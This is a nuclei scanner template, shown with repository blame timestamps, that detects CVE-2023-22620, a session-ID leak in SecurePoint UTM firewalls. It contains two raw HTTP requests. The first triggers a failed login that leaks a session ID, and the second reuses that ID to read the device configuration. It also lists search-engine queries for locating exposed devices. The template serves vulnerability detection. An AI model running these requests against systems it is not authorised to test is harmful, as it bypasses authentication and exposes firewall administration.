nuclei-templates/http/cves/2023/CVE-2023-22620.yaml

78 lines
2.8 KiB
YAML
Raw Normal View History

2023-04-20 09:17:09 +00:00
id: CVE-2023-22620
info:
name: SecurePoint UTM 12.x Session ID Leak
author: DhiyaneshDK
2023-07-11 19:49:27 +00:00
severity: high
2023-04-20 20:09:20 +00:00
description: |
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or perform actions on behalf of the user.
2023-09-06 11:43:37 +00:00
remediation: Upgrade to version 12.2.5.1 or newer
2023-04-20 09:17:09 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-22620
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txt
- https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/
- https://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.html
2023-07-11 19:49:27 +00:00
- https://rcesecurity.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 7.5
cve-id: CVE-2023-22620
cwe-id: CWE-863
2024-05-31 19:23:20 +00:00
epss-score: 0.03698
epss-percentile: 0.91758
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*
2023-04-20 09:17:09 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: securepoint
product: unified_threat_management
shodan-query:
- title:"Securepoint UTM"
- http.title:"securepoint utm"
2024-05-31 19:23:20 +00:00
fofa-query: title="securepoint utm"
google-query: intitle:"securepoint utm"
2024-01-14 09:21:50 +00:00
tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint
2023-04-20 09:17:09 +00:00
http:
2023-04-20 09:17:09 +00:00
- raw:
- |
POST /spcgi.cgi HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
{"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}}
- |
POST /spcgi.cgi HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
{"module":"system","command":["config","get"],"sessionid":"{{session}}"}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '"status":"OK"'
- type: word
part: header_2
words:
- 'application/json'
2023-07-11 19:49:27 +00:00
extractors:
- type: regex
name: session
group: 1
regex:
- '"sessionid": "([a-z0-9]+)"'
internal: true
# digest: 4a0a00473045022005e917854de14505ee6a5e3560d7d1a8618149cb2074378f2b420bcd9ef629e7022100a7404d0a575179049ed915c41286482d0d6d965629ca16b5eba4341b6f9950c5:922c64590222798bb761d5b6d8e72950